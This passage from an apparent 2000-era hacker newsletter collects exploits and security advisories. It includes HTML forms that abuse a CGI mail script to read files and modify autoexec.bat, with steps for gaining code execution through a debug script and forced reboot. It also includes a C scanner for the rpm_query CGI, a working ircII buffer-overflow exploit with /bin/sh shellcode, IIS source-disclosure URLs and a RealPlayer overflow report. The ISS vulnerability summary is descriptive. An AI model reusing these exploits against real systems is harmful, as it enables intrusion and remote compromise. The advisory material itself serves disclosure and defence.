<input type="text" name="_1_MailServer" value="yourhost"><br>
<input type="text" name="_1_MailTemplate" value="..\xitami.aut"><br>
<input type="hidden" size="30" name="_1_MailTo" value="me@isp.com">
<input type="hidden" size="40" name="Name" value="me">
<input type="submit" value="Send" name="_2_Submit">
</form>
<br>
Append to file:<br>
Note: your text will be preceeded by garbage.<br>
<body bgcolor="#FFFFFF">
<form method="POST" action="http://localhost/cgi-bin/mailform.exe">
<input type="hidden" name="_1_MailServer" value="x">
<input type="hidden" name="_1_MailTemplate" value="nul">
<input type="text" name="_1_TextLog" size="40" value="c:\autoexec.bat"><br>
<input type="hidden" size="30" name="_1_MailTo" value="me@isp.com">
<textarea name="Name" rows="4" cols="40"></textarea>
<br><input type="submit" value="Send" name="_2_Submit">
</form>
<a href="http://midgets.box.sk">The Mad Midget Mafia</a><br>
</body>
</html>
[snip]
The e-mail will be sent to the host you specify on port 25. It should
be easy enough to capture using netcat.
Implementation: full compromise
=================================
When appending text to files, the following kind of ugly crap
preceeds it:
[snip]
Submitted at Thu Apr 06 22:14:49 2000 from 192.168.1.1
Name:
[snip]
Even with this handicap, we can still modify/create batch files.
This is how we will execute code.
The idea here is to create a kind of "script" for debug that will
assemble and execute a small program. It is basically just a list of
keystrokes. We then add an entry to autoexec.bat that executes it.
Fist we need to upload the following file to c:\windows\script.txt
[snip]
a 100
mov dx,10b
mov ah,09
int 21
mov ah,4c
int 21
db "Code has been executed.",0d,0a,"$"
g=100
q
[snip]
Make sure at the end of each line there is _no_ carriage return. Each
line should be terminated by \x0a (linefeed). Get rid of the carriage
returns (\x0d), ie:
a 100
mov dx,10b
mov ah,09
int 21
mov ah,4c
int 21
db "Code has been executed.",0d,0a,"$"
g=100
q
Add a newline (\x0d,\x0a) before the above, and submit the two lines
using the web-based interface.
Add the following line to any batch file that is executed upon start-up
(ie, autoexec.bat):
debug < c:\windows\script.txt
Check that everything is in order by trying to download both script.txt
and the batch file you modified.
Force a reboot using the con\con vulnerability. Once it restarts, the
code will be executed. I know this is a really ugly hack, but it works
(poor excuse). Also, make sure the garbage doesn't interfere with
anything (always put a newline before the start of your commands).
=======================================================================
@HWA
250.0 PSS: CGI rmp_query scanner
~~~~~~~~~~~~~~~~~~~~~~~~~~
/*
rmp_query : /cgi-bin/rmp_query server scanning program.
Scanner by Alhambra (slightly modified)
A vulnerability exists in the default installation
of Caldera OpenLinux 2.3. A CGI is installed in
/home/httpd/cgi-bin/ names rpm_query. Any user can
run this CGI and obtain a listing of the packages,
and versions of packages, installed on this system.
This could be used to determine vulnerabilities
on the machine remotely.
Usage:
rmp_query <infile><outfile>
*/
#include <sys/stat.h>
#include <sys/types.h>
#include <termios.h>
#include <unistd.h>
#include <stdio.h>
#include <fcntl.h>
#include <sys/syslog.h>
#include <sys/param.h>
#include <sys/times.h>
#ifdef LINUX
#include <sys/time.h>
#endif
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <sys/signal.h>
#include <arpa/inet.h>
#include <netdb.h>
int FLAG = 1;
int Call(int signo)
{
FLAG = 0;
}
main (int argc, char *argv[])
{
char host[100], buffer[1024], hosta[1024],FileBuf[8097];
int outsocket, serv_len, len,X,c,outfd;
struct hostent *nametocheck;
struct sockaddr_in serv_addr;
struct in_addr outgoing;
char rmpMessage[]="GET /cgi-bin/rmp_query\n";
while(fgets(hosta,100,stdin))
{
if(hosta[0] == '\0')
break;
hosta[strlen(hosta) -1] = '\0';
write(1,hosta,strlen(hosta)*sizeof(char));
write(1,"\n",sizeof(char));
outsocket = socket (AF_INET, SOCK_STREAM, 0);
memset (&serv_addr, 0, sizeof (serv_addr));
serv_addr.sin_family = AF_INET;
nametocheck = gethostbyname (hosta);
(void *) memcpy (&outgoing.s_addr, nametocheck->h_addr_list[0], sizeof(outgoing.s_addr));
strcpy (host, inet_ntoa (outgoing));
serv_addr.sin_addr.s_addr = inet_addr (host);
serv_addr.sin_port = htons (80);
signal(SIGALRM,Call);
FLAG = 1;
alarm(10);
X=connect (outsocket, (struct sockaddr *) &serv_addr, sizeof (serv_addr));
alarm(0);
if(FLAG == 1 && X==0){
write(outsocket,rmpMessage,strlen(rmpMessage)*sizeof(char));
while((X=read(outsocket,FileBuf,8096))!=0) write(1,FileBuf,X);
}
close (outsocket);
}
return 0;
}
@HWA
251.0 PSS:New ircii exploit
~~~~~~~~~~~~~~~~~~~~~
/*
ircii-4.4 exploit by bladi & aLmUDeNa
buffer overflow in ircii dcc chat's
allow to excute arbitrary
Affected:
ircII-4.4
Patch:
Upgrade to ircII-4.4M
ftp://ircftp.au.eterna.com.au/pub/ircII/ircii-4.4M.tar.gz
Offset:
SuSe 6.x :0xbfffe3ff
RedHat :0xbfffe888
Thanks to : #warinhell,#hacker_novatos
Special thanks go to: Topo[lb],
Saludos para todos los que nos conozcan especialmente para eva ;)
(bladi@euskalnet.net)
*/
#include <stdio.h>
#include <netdb.h>
#include <string.h>
#include <signal.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
char *h_to_ip(char *hostname);
char *h_to_ip(char *hostname) {
struct hostent *hozt;
struct sockaddr_in tmp;
struct in_addr in;
if ((hozt=gethostbyname(hostname))==NULL)
{
printf(" ERROR: IP incorrecta\n");
exit(0);
}
memcpy((caddr_t)&tmp.sin_addr.s_addr, hozt->h_addr, hozt->h_length);
memcpy(&in,&tmp.sin_addr.s_addr,4);
return(inet_ntoa(in));
}
main(int argc, char *argv[])
{
struct sockaddr_in sin;
char *hostname;
char nops[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";
char *shell =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
int outsocket,tnt,i;
printf (" irciismash ver: 1.0\n");
printf (" by \n");
printf (" bladi & aLmUDeNa\n\n");
if (argc<3)
{
printf("Usage : %s hostname port\n",argv[0]);
exit(-1);
}
hostname=argv[1];
outsocket=socket(AF_INET,SOCK_STREAM,0);
sin.sin_family=AF_INET;
sin.sin_port=htons(atoi(argv[2]));
sin.sin_addr.s_addr=inet_addr(h_to_ip(hostname));
if (connect (outsocket, (struct sockaddr *) &sin, sizeof(sin)) == -1) {
printf(" ERROR: El puerto esta cerradito :_(\n");
exit(0);
}
printf("[1]- Noping\n [");
for(i=0;i<47;i++)
{
if(!(i % 7)) { usleep (9); printf("."); fflush(stdout); }
write(outsocket,nops,strlen(nops));
}
printf("]\n");
printf(" Noped\n");
printf("[2]- Injectin shellcode\n");
write(outsocket,shell,strlen(shell));
usleep(999);
printf(" Injected\n");
printf("[3]- Waiting\n [");
for(i=0;i<299;i++)
{
printf(".");
fflush(stdout);
usleep(99);
write(outsocket,"\xff",strlen("\xff"));
write(outsocket,"\xbf",strlen("\xff"));
write(outsocket,"\xff",strlen("\xe9"));
write(outsocket,"\xe3",strlen("\xff"));
}
printf("]\n[4]- Xploit \n - --(DoNe)-- -\n");
close(outsocket);
}
/* www.hack.co.za */
@HWA
252.0 PSS:Cerberus Information Security Advisory (CISADV000330)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Cerberus Information Security Advisory (CISADV000330)
http://www.cerberus-infosec.co.uk/advisories.shtml
Released : 30th March 2000
Name : Index Server (Strike 3!)
Affected Systems : Microsoft Internet Information Server
Issue : Attackers can gain source of ASP and other pages
Author : David Litchfield (mnemonix@globalnet.co.uk)
Description
***********
The Cerberus Security Team has found a third issue with Microsoft's Index
Server that
affects any web site running Internet Information Server 4 or 5 with Index
Server
even if the recent Index Server patch has been installed and even if no .htw
files exist on the file system. These systems are at risk from having the
source
of ASP pages or other files such as the global.asa being revealed. Often
these
files contain sensitive information such as user IDs and passwords and
database
source names that are of use to an attacker attempting to break into a
site/network.
Details
*******
If a request is made to
http://charon/null.htw?CiWebHitsFile=/default.asp&CiRestriction=none&CiHilit
eType=Full
only the HTML a user would normally see is returned. However by appending a
%20 to the
end of the CiWebHitsFile parameter:
http://charon/null.htw?CiWebHitsFile=/default.asp%20&CiRestriction=none&CiHi
liteType=Full
it is possible to get the full source.
Part of the problem exists because 'null.htw' is not a real file that maps
to any file
on the file system, rather it is a 'virtual file' held in memory so even if
there are
no real .htw files on the file system IIS boxes with Index Server will still
be at risk.
Any request made to null.htw is dealt with by webhits.dll.
Solution
********
If the functionality provided by webhits is need install Microsoft's patch.
If the functionality is not needed, however, simply unmap the .htw extention
from webhits.dll using the Internet Service Manager MMC snap-in.
A check for this issue already exists in our security scanner, CIS.
More details about CIS can be found on our web site:
http://www.cerberus-infosec.com
Vendor Status
*************
Microsoft were alerted to this issue on the 23rd of February and
have updated an earlier patch, information about which can be found at
http://www.microsoft.com/technet/security/bulletin/ms00-006.asp
About Cerberus Information Security, Ltd
********************************
Cerberus Information Security, Ltd, a UK company, are specialists in
penetration testing and other security auditing services. They are the
developers of CIS (Cerberus' Internet security scanner) available for free
from their website: http://www.cerberus-infosec.com
To ensure that the Cerberus Security Team remains one of the strongest
security audit teams available globally they continually research operating
system and popular service software vulnerabilites leading to the discovery
of "world first" issues. This not only keeps the team sharp but also helps
the industry and vendors as a whole ultimately protecting the end consumer.
As testimony to their ability and expertise one just has to look at exactly
how many major vulnerabilities have been discovered by the Cerberus Security
Team - over 50 to date, making them a clear leader of companies offering
such security services.
Founded in late 1999, by Mark and David Litchfield, Cerberus Information
Security, Ltd are located in London, UK but serves customers across the
World. For more information about Cerberus Information Security, Ltd please
visit their website or call on +44(0) 181 661 7405
Permission is hereby granted to copy or redistribute this advisory but only
in its entirety.
Copyright (C) 2000 by Cerberus Information Security, Ltd
@HWA
253.0 PSS:Win32 Realplayer 6/7 Buffer Overflow
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Win32 Realplayer 6/7 Buffer Overflow
Vulnerability Summary:
----------------------
There is a buffer overflow in the Win32 RealPlayer Basic client,
versions 6 and 7. This appears to occur when >299 characters
are entered as a 'location' to play, such as http://aaaaa.....
with 300 a's. I have tested the MacOS and Linux Realplayer
clients and have as yet not found such a vulnerability.
Using the HTML "EMBED" tag to embed RealPlayer in a webpage
and setting the "AUTOSTART=true" flag, you can force RealPlayer
to start automatically, triggering the overflow condition.
While I have not taken the time to find the proper entrance
point in PNEN3260.DLL (which is what crashes, for example,
in RealPlay 6 Basic), it appears that arbitrary code could
be exploited simply by *VISITING* a webpage with the
malicious embedded RealPlayer tags.
(the following example is using RealPlayer v.6 Basic)
In full effect, yo:
-------------------
For example: RealPlayer Win32 Version 6.0.7.380
Type into "Location" http://aaaaaaaaaaa..... (300 a's)
"This program has performed an illegal operation and will be shut
down."
REALPLAY caused an invalid page fault in
module PNEN3260.DLL at 015f:6216d7ca.
Registers:
EAX=61616161 CS=015f EIP=6216d7ca EFLGS=00010202
EBX=007c0158 SS=0167 ESP=00c6fe70 EBP=00c6fe88
ECX=007c0350 DS=0167 ESI=007c0350 FS=629f
EDX=00000001 ES=0167 EDI=007c0350 GS=0000
Bytes at CS:EIP:
ff 10 33 d2 f7 77 08 8b 47 04 8b 34 90 85 f6 8d
Stack dump:
007c0100 61616161 007c0350 007c0158 007c04d0 78009494 00c6fe9c
6216d853 007c0100 007c0100 007c0100 00c6feac 6218407b 007c0100
007c0100 00c6fed4
Fun. It looks like RealPlayer can be made to execute arbitrary
code. It gets worse, using the HTML EMBED tag for RealPlayer you
can force a web browser (MSIE in this case) to crash as well.
This is left as an exercise for the reader....
Once you embed the RealPlayer in an html page, when Real crashes,
it takes Internet Explorer with it...
"This program has performed an illegal operation and will be shut
down"
IEXPLORE caused an invalid page fault in
module KERNEL32.DLL at 015f:bff7a379.
Registers:
EAX=61616161 CS=015f EIP=bff7a379 EFLGS=00010216
EBX=084e5054 SS=0167 ESP=0058d840 EBP=0058d864
ECX=61616161 DS=0167 ESI=000003b4 FS=5ac7
EDX=084d0000 ES=0167 EDI=01615dac GS=0000
Bytes at CS:EIP:
89 41 08 8b 53 04 8b 43 08 89 50 04 8d 04 33 50
Stack dump:
01615dac 00000000 084d000c 084d0000 084e5054
00000000 00000000 00009afb 000084e6 0058d88c
bff7a541 084d0000 084e5054 000003b4 00000000
00000001
and the extra bonus of:
"This program has performed an illegal operation and will be shut
down"
IEXPLORE caused an invalid page fault in
module PNEN3260.DLL at 015f:621874ba.
Registers:
EAX=8004004e CS=015f EIP=621874ba EFLGS=00010202
EBX=000000c8 SS=0167 ESP=067dfecc EBP=067dfed4
ECX=08616860 DS=0167 ESI=086163e0 FS=3937
EDX=61616161 ES=0167 EDI=8004004e GS=0000
Bytes at CS:EIP:
ff 52 08 8b c7 5f 5e 5d c2 10 00 90 90 90 90 90
Stack dump:
08616b90 085e69f0 067dfeec 6218893b 085034ec
00400050 00400000 00400000 067dff04 621838b4
08616b90 04606568 0000023c 086163e0 067dff38
62183a47
load the malicious page enough times and you get a fun dialog box
that just won't go away... unless you reboot.
"This program has performed an illegal operation and will be shut
down"
IEXPLORE caused an invalid page fault in
module KERNEL32.DLL at 015f:bff87eb5.
Registers:
EAX=c00300ec CS=015f EIP=bff87eb5 EFLGS=00010206
EBX=0288fb1c SS=0167 ESP=0284fff0 EBP=0285005c
ECX=00000000 DS=0167 ESI=83b934e0 FS=2c0f
EDX=83b934e8 ES=0167 EDI=00c1e79c GS=0000
Bytes at CS:EIP:
53 56 57 8b 30 83 7d 10 01 8b 4e 38 89 4d f8 75
Stack dump:
etc etc etc.
Resolution:
-----------
Vendor Notified 3 April 2000, 10:00 AM MST via email.
Vendor patch should be forthcoming...
----------------------------------------------------
- Adam Muntner \ Save the Whales! -
- adam@alienzoo.com \ Collect Valuable -
- Systems Engineer \ Prizes! -
- http://www.alienzoo.com \ -
----------------------------------------------------
-----------------------------------------------------
Get free email and alien enlightenment from
http://www.alienzoo.com
@HWA
254.0 ISS Security summary data sheet
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-----BEGIN PGP SIGNED MESSAGE-----
ISS Security Alert Summary
April 1, 2000
Volume 5 Number 3
X-Force Vulnerability and Threat Database: http://xforce.iss.net/ To
receive these Alert Summaries, subscribe to the ISS Alert mailing list.
Send an email to majordomo@iss.net, and within the body of the message
type: 'subscribe alert'.
_____
Contents
33 Reported Vulnerabilities
- windmail-pipe-command
- windmail-fileread
- simpleserver-exception-dos
- linux-domain-socket-dos
- linux-gpm-root
- outlook-manipulate-hidden-drives
- vqserver-dir-traverse
- vqserver-passwd-plaintext
- iis-chunked-encoding-dos
- nav-email-gateway-dos
- netscape-server-directory-indexing
- mercur-webview-get-dos
- officescan-admin-pw-plaintext
- officescan-admin-access
- linux-kreatecd-path
- win-dos-devicename-dos
- wmcdplay-bo
- nt-registry-permissions
- staroffice-scheduler-fileread
- staroffice-scheduler-bo
- iis-root-enum
- mssql-query-abuse
- clipart-cil-bo
- oracle-installer
- linux-rpm-query
- thebat-mua-attach
- irix-infosrch-fname
- linux-dosemu-config
- coldfusion-reveal-pathname
- netscape-enterprise-command-bo
- nmh-execute-code
- htdig-remote-read
- ie-html-shortcut
Risk Factor Key
_____
Date Reported: 3/25/00
Vulnerability: windmail-pipe-command
Platforms Affected: WindMail 3.0
Risk Factor: High
Attack Type: Network Based
WindMail is a command-line email messenger for Windows that can create
mail forms for web sites from CGI scripts. By issuing an HTTP command that
includes the pipe character, an attacker could execute arbitrary commands
on the vulnerable system.
Reference:
Bugtraq Mailing List: "Windmail allow web user get any file" at:
http://www.securityfocus.com/templates/archive.pike?list=1&date=2000-03-22&msg=20000325224146.6839.qmail@securityfocus.com
_____
Date Reported: 3/25/00
Vulnerability: windmail-fileread
Platforms Affected: WindMail 3.0
Risk Factor: Medium
Attack Type: Network Based
WindMail is a command-line email messenger for Windows that can create
mail forms for web sites from CGI scripts. By sending a
specially-formatted URL, an attacker could retrieve any ASCII file on the
vulnerable system.
Reference:
Bugtraq Mailing List: "Windmail allow web user get any file" at:
http://www.securityfocus.com/templates/archive.pike?list=1&date=2000-03-22&msg=20000325224146.6839.qmail@securityfocus.com
_____
Date Reported: 3/25/00
Vulnerability: simpleserver-exception-dos
Platforms Affected: SimpleServer WWW 1.03
Risk Factor: Medium
Attack Type: Network/Host Based
AnalogX SimpleServer WWW is a standard web server for Windows. Version
1.03 is vulnerable to a simple denial of service attack. By requesting a
URL with exactly 8 characters following the /cgi-bin/ directory, an
attacker can crash the server, requiring it to be rebooted.
Reference:
Bugtraq Mailing List: "AnalogX SimpleServer 1.03 Remote Crash" at:
http://www.securityfocus.com/templates/archive.pike?list=1&msg=web-5645555@post2.rnci.com
_____
Date Reported: 3/23/00
Vulnerability: linux-domain-socket-dos
Platforms Affected: RedHat Linux (6.1, 6.2)
Risk Factor: Medium
Attack Type: Network/Host Based
The Linux kernel is vulnerable to a denial of service attack due to
improper handling of Unix domain sockets. The Unix domain sockets ignore
limits set in wmem_max. A local attacker can crash the system by creating
successive Unix domain sockets, requiring the system to be rebooted.
Reference:
Bugtraq Mailing List: "Local Denial-of-Service attack against Linux" at:
http://www.securityfocus.com/templates/archive.pike?list=1&msg=20000323175509.A23709@clearway.com
_____
Date Reported: 3/22/00
Vulnerability: linux-gpm-root
Platforms Affected: Linux running Global Purpose Mouse
Risk Factor: Low
Attack Type: Host Based
The General Purpose Mouse (gpm) package is a tool to enable the mouse for
cutting and pasting on consoles, which ships with several Linux
distributions. Due to a design flaw in gpm-root, which causes the setgid
call to fail, a local user with console access can obtain the group id
that is running gpm-root (usually root).
Reference:
Bugtraq Mailing List: "gpm-root" at:
http://www.securityfocus.com/templates/archive.pike?list=1&msg=20000322182143.4498.qmail@securityfocus.com
_____
Date Reported: 3/22/00
Vulnerability: outlook-manipulate-hidden-drives
Platforms Affected: Microsoft Outlook 98
Risk Factor: Medium
Attack Type: Host Based
Microsoft Outlook contains a vulnerability that would allow a local user
to view hidden drives. In Windows NT, an administrator can hide specific
drives using systems policies, so that they cannot be accessed using My
Computer, Windows NT Explorer, or the command prompt. However, the Insert
File option in Microsoft Outlook reveals the hidden drives, allowing a
user to copy, cut, paste, or delete files.
Reference:
Bugtraq Mailing List: "Hide Drives does not work with OUTLOOK 98" at:
http://www.securityfocus.com/templates/archive.pike?list=1&date=2000-03-22&msg=20000322151011.2581.qmail@securityfocus.com
_____
Date Reported: 3/21/00
Vulnerability: vqserver-dir-traverse
Platforms Affected: vqSoft's vqServer
Risk Factor: Medium
Attack Type: Network/Host Based
The vqServer program by vqSoft is a Java-based personal web server for
cross-platform environments. Version 1.9.9 of vqServer, and possibly
others, contains a vulnerability that would allow a user to traverse the
directories by appending /........../ to a URL, then submitting to the
server. This would allow a remote attacker to access any file on the
system.
Reference:
Bugtraq Mailing List: "vqserver /........../" at:
http://www.securityfocus.com/templates/archive.pike?list=1&msg=4.1.20000321084646.0095c7f0@olga.swip.net
_____
Date Reported: 3/21/00
Vulnerability: vqserver-passwd-plaintext
Platforms Affected: vqSoft's vqServer
Risk Factor: High
Attack Type: Network/Host Based
The vqServer program by vqSoft is a Java-based personal web server for
cross-platform environments. Version 1.9.9 of vqServer, and possibly
others, stores server settings and passwords unencrypted. A remote user
could access the password file, via a directory transversal vulnerability
in the program, to obtain the administrator password and gain
administrative rights to the server.
Reference:
Bugtraq Mailing List: "vqserver /........../" at:
http://www.securityfocus.com/templates/archive.pike?list=1&msg=4.1.20000321084646.0095c7f0@olga.swip.net
_____
Date Reported: 3/20/00
Vulnerability: iis-chunked-encoding-dos
Platforms Affected: Microsoft Internet Information Server 4.0
Risk Factor: Medium
Attack Type: Network/Host Based
Microsoft Internet Information Server (IIS) 4.0 contains a vulnerability
in its support for chunked encoding transfers, because it does not limit
the size of these transfers. An attacker could consume memory on the
server by requesting a buffer be reserved for an extremely large amount of
data, and then keeping the session open without sending the data. It is
possible for an attacker to consume enough memory to cause the server to
stop functioning properly. The server could be restored by stopping and
restarting the IIS service.
Reference:
Microsoft Security Bulletin (MS00-018): "Patch Available for 'Chunked
Encoding Post' Vulnerability" at:
http://www.microsoft.com/technet/security/bulletin/ms00-018.asp
_____
Date Reported: 3/17/00
Vulnerability: nav-email-gateway-dos
Platforms Affected: Norton AntiVirus for Internet Email Gateways
Risk Factor: Medium
Attack Type: Network/Host Based
Norton AntiVirus for Internet Email Gateways is a SMTP agent that scans
email attachments for viruses. It includes an web-based management and
administration interface that uses an embedded web server in the product.
By sending a long URL to the server, a user will overflow a buffer and
crash the program.
Reference:
Bugtraq Mailing List: "DoS with NAVIEG" at:
http://www.securityfocus..com/templates/archive.pike?list=1&msg=s8d1f3e3.036@kib.co.kodiak.ak.us
_____
Date Reported: 3/17/00
Vulnerability: netscape-server-directory-indexing
Platforms Affected: Netscape Enterprise Server (3.0, 3.51, 3.6)
Risk Factor: Medium
Attack Type: Network/Host Based
Netscape Enterprise Server version 3.x contains a feature called Directory
Indexing. This feature, which is enabled by default, displays a directory
listing when the a user includes certain tags in a requested URL. This
could allow a remote attacker to gain unauthorized access to documents or
retrieve lists of file names (such as CGI scripts).
Reference:
Bugtraq Mailing List: "[SAFER 000317.EXP.1.5] Netscape Enterprise Server
and '?wp' tags" at:
http://www.securityfocus.com/templates/archive.pike?list=1&msg=38D2173D.24E39DD0@relaygroup.com
_____
Date Reported: 3/16/00
Vulnerability: mercur-webview-get-dos
Platforms Affected: Mercur WebView WebMail-Client 1.0
Risk Factor: Medium
Attack Type: Network/Host Basde
MERCUR WebView WebMail-Client 1.0 is an add-on to the MERCUR 3.0 mail
server that allows users to read email via a web browser. Due to improper
bounds checking in the GET command on port 1080, a user can overflow a
buffer and cause the WebMail service to crash.
Reference:
Underground Security Systems Research: "Local / Remote DoS Attack in
MERCUR WebView WebMail-Client 1.0 for Windows 98/NT Vulnerability" at:
http://www.ussrback.com/labs36.html
_____
Date Reported: 3/16/00
Vulnerability: officescan-admin-pw-plaintext
Platforms Affected: Trend Micro OfficeScan Corporate Edition
(3.0, 3.11, 3.13, 3.5)
Risk Factor: High
Attack Type: Network/Host Based
Trend Micro OfficeScan 3.51 and below transmits the administrator password
over the network in cleartext. OfficeScan is anti-virus software for
corporate networks. When configured in the web-based mode on a Windows NT
server, an attacker can use a sniffing program to intercept the
administrator password.
Reference:
Bugtraq Mailing List: "OfficeScan TrendMicro: admin for everybody!" at:
http://www.securityfocus.com/templates/archive.pike?list=1&msg=38D0E213.5F0AA04@neurocom.com
_____
Date Reported: 3/16/00
Vulnerability: officescan-admin-access
Platforms Affected: Trend Micro OfficeScan Corporate Edition
(3.0, 3.11, 3.13, 3.5)
Risk Factor: High
Attack Type: Network/Host Based
Trend Micro OfficeScan 3.51 and below allows users to perform
administrative tasks without authentication. OfficeScan is anti-virus
software for corporate networks. When configured in the web-based mode on
a Windows NT server, an unauthenticated attacker can use a web browser to
access and execute cgi scripts for administration of the software across
the network.
References:
Bugtraq Mailing List: "OfficeScan TrendMicro: admin for everybody!" at:
http://www.securityfocus.com/templates/archive.pike?list=1&msg=38D0E213.5F0AA04@neurocom.com
Bugtraq Mailing List: "Trend Micro releases Patch for 'OfficeScan
Unauthenticated CGI Usage' vulnerability" at:
http://www.securityfocus.com/templates/archive.pike?list=1&date=2000-03-22&msg=D129BBE1730AD2118A0300805FC1C2FE0650E8E6@209-76-212-10.trendmicro.com
_____
Date Reported: 3/16/00
Vulnerability: linux-kreatecd-path
Platforms Affected: SUSE Linux (6.0, 6.1, 6.2, 6.3)
Risk Factor: High
Attack Type: Host Based
The kreatecd package is a graphical front end tool for the cdrecord
command that ships with several Linux distributions. The program is
installed setuid root and is designed to trust the configuration path to
cdrecord. A local attacker could use kreatecd to execute commands as root.
Reference:
Bugtraq Mailing List: "TESO & C-Skills development advisory -- kreatecd" at:
http://www.securityfocus.com/templates/archive.pike?list=1&msg=ine.LNX.3.96.1000316143853.257E-200000@ati12.cs.uni-potsdam.de
_____
Date Reported: 3/16/00
Vulnerability: win-dos-devicename-dos
Platforms Affected: Windows 95
Windows 98
Risk Factor: Medium
Attack Type: Network Based
Microsoft Windows 95 and 98 contain a vulnerability in the parsing of file
path names. DOS device names, such as COM1 or LPT1, are reserved words and
normally cannot be used as file or directory names. If a user attempts to
access a file path name that includes one DOS device name, it is treated
as invalid, and an error is returned. However, if the path name includes
multiple DOS device names, the machine will crash.
Reference:
Microsoft Security Bulletin (MS00-017): "Patch Available for 'DOS Device
in Path Name' Vulnerability" at:
http://www.microsoft.com/technet/security/bulletin/ms00-017.asp
_____
Date Reported: 3/10/00
Vulnerability: wmcdplay-bo
Platforms Affected: wmcdplay
Risk Factor: High
Attack Type: Host Based
The wmcdplay CD player program is vulnerable to a buffer overflow attack.
An local attacker can pass an argument to overflow the stack, due to
insufficient bounds checking on calls to sprintf. The program is setuid
root, allowing an attacker to gain root privileges by overflowing the
stack and executing arbitrary code on the system.
Reference:
BugTraq mailing list: "wmcdplay Buffer Overflow Vulnerability" at:
http://www.securityfocus.com/templates/archive.pike?list=1&msg=20000311143230.4C0C01EE8B@lists.securityfocus.com
_____
Date Reported: 3/9/00
Vulnerability: nt-registry-permissions
Platforms Affected: Microsoft Windows NT 4.0
Risk Factor: High
Attack Type: Host Based
Windows NT 4.0 including Workstation, Server, and Terminal Server
versions, have some registry permissions that are too permissive. A local
user with access to the machine could potentially increase their access
and cause code to be executed on the machine.
Reference:
Microsoft Security Bulletin (MS00-008): 'Patch Available for "Registry
Permissions' Vulnerability" at:
http://www.microsoft.com/technet/security/bulletin/ms00-008.asp
_____
Date Reported: 3/9/00
Vulnerability: staroffice-scheduler-fileread
Platforms Affected: StarOffice 5.1
Risk Factor: Medium
Attack Type: Network Based
StarOffice is an office-productivity suite from Sun Microsystems. The
StarSchedule server, which controls the group scheduling component of
StarOffice, allows an attacker to read files on the server. A remote user
can traverse directories using "../" paths to read any file on the server
through a browser.
Reference:
Bugtraq Mailing List: "[SAFER 000309.EXP.1.4] StarScheduler (StarOffice)
vulnerabilities" at:
http://www.securityfocus.com/templates/archive.pike?list=1&msg=38C68FB8.6F234393@relaygroup.com
_____
Date Reported: 3/9/00
Vulnerability: staroffice-scheduler-bo
Platforms Affected: StarOffice 5.1
Risk Factor: High
Attack Type: Network Based
StarOffice is an office-productivity suite from Sun Microsystems. The
StarSchedule server, which controls the group scheduling component of
StarOffice, is vulnerable to a buffer overflow attack. Sending a large
amount of data to the GET command will crash the server, and could allow
an attacker to execute arbitrary code as root.
Reference:
Bugtraq Mailing List: "[SAFER 000309.EXP.1.4] StarScheduler (StarOffice)
vulnerabilities" at:
http://www.securityfocus.com/templates/archive.pike?list=1&msg=38C68FB8.6F234393@relaygroup.com
_____
Date Reported: 3/8/00
Vulnerability: iis-root-enum
Platforms Affected: IIS (4.0, 5.0)
Risk Factor: Medium
Attack Type: Host Based
Microsoft Internet Information Server (IIS) 4.0 and 5.0 discloses paths of
network shares if configured incorrectly. Files of type IDQ, IDA, and HTX
cannot be served from a network share. If a web site administrator
attempts to serve these type of files from network shares, a user who
attempts to access them will receive an error message that discloses the
share path of the file.
Reference:
BugTraq mailing list: "Microsoft IIS UNC Path Disclosure Vulnerability" at:
http://www.securityfocus.com/templates/archive.pike?list=1&msg=007201bf89dc$a18dd2e0$056fee3f@spis.net
_____
Date Reported: 3/8/00
Vulnerability: mssql-query-abuse
Platforms Affected: Microsoft SQL Server 7.0
Microsoft Data Engine 1.0
Risk Factor: High
Attack Type: Network Based
Microsoft SQL Server 7.0 and Microsoft Data Engine 1.0 are vulnerable to a
remote query problem. The server and engine do not perform sufficient
argument validation on particular types of SQL statements. A remote user
who has access to submit queries could take actions on the SQL database
and possibly perform actions on the server itself.
Reference:
Microsoft Security Bulletin (MS00-014): "Patch Available for 'SQL Query
Abuse' Vulnerability" at:
http://www.microsoft.com/technet/security/bulletin/ms00-014.asp
_____
Date Reported: 3/6/00
Vulnerability: clipart-cil-bo
Platforms Affected: Microsoft Office 2000
Microsoft Works 2000
Risk Factor: High
Attack Type: Host Based
Microsoft Clip Art Gallery, shipped with such packages as Microsoft Office
2000 and Microsoft Works 2000, contains a possible buffer overflow in the
handling of CIL files. The CIL file format is used for downloading
additional clips for installation into the gallery. If a CIL file is
created with a long field embedded in it, it will overflow the buffer and
crash the Clip Gallery, which could result in the execution of arbitrary
code.
Reference:
Microsoft Security Bulletin (MS00-015): "Patch Available for 'Clip Art
Buffer Overrun' Vulnerability" at:
http://www.microsoft.com/technet/security/bulletin/ms00-015.asp
_____
Date Reported: 3/5/00
Vulnerability: oracle-installer
Platforms Affected: Oracle 8.1.5i
Risk Factor: High
Attack Type: Host Based
The installation program for Oracle 8.1.5i contains a vulnerability that
could allow an attacker to gain root access. The Oracle installation
script creates the directory /tmp/orainstall, owned by oracle:dba, mode
711, containing the shell script orainstRoot.sh, mode 777. Then, the
installation program stops and asks the user to run the orainstRoot.sh
script. An attacker could create a symbolic link from this file to
elsewhere on the file system, which could be used to create an .rhosts
file and gain access to the root account. A local user could also edit
this script to execute arbitrary commands when run by root.
Reference:
BugTraq Mailing List: "Oracle for Linux Installer Vulnerability" at:
http://www.securityfocus.com/templates/archive.pike?list=1&msg=Pine.BSO.4.10.10003051801030.22289-100000@obscurity.org
_____
Date Reported: 3/3/00
Vulnerability: linux-rpm-query
Platforms Affected: Caldera OpenLinux 2.3
Risk Factor: Medium
Attack Type: Network Based
Caldera OpenLinux 2.3 contains a vulnerability in the rpm_query CGI. The
rpm_query CGI is installed in the /home/httpd/cgi-bin/ directory. A remote
user could run this CGI to obtain a listing of the name and version number
of every package installed on the system.
Reference:
